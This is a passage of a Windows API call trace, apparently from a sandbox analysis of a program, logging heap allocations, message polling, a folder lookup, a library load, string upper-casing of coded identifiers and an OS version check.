(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0217.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0217.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0217.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0217.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0217.416] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Music", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 0x9e2138 [0217.416] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0217.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0217.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0217.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0217.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0217.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0217.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0217.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0217.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0217.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0217.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0217.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0217.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0217.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0217.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0217.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0217.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.417] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0217.418] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0217.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0217.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0217.418] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0217.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0217.418] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0217.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0217.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0217.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0217.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0217.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0217.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0217.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0217.419] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0217.419] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0217.419] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0217.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0217.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0217.419] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0217.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0217.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0217.419] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0217.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0217.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0217.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0217.420] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0217.420] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0217.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0217.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0217.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0217.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0217.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0217.421] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0217.421] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.421] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0217.421] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.421] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0217.422] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0217.422] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0217.422] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0217.422] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0217.422] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0217.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0217.423] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0217.423] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.423] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0217.423] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0217.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0217.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0217.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0217.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0217.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0217.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0217.424] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.424] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0217.424] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0217.424] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0217.424] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 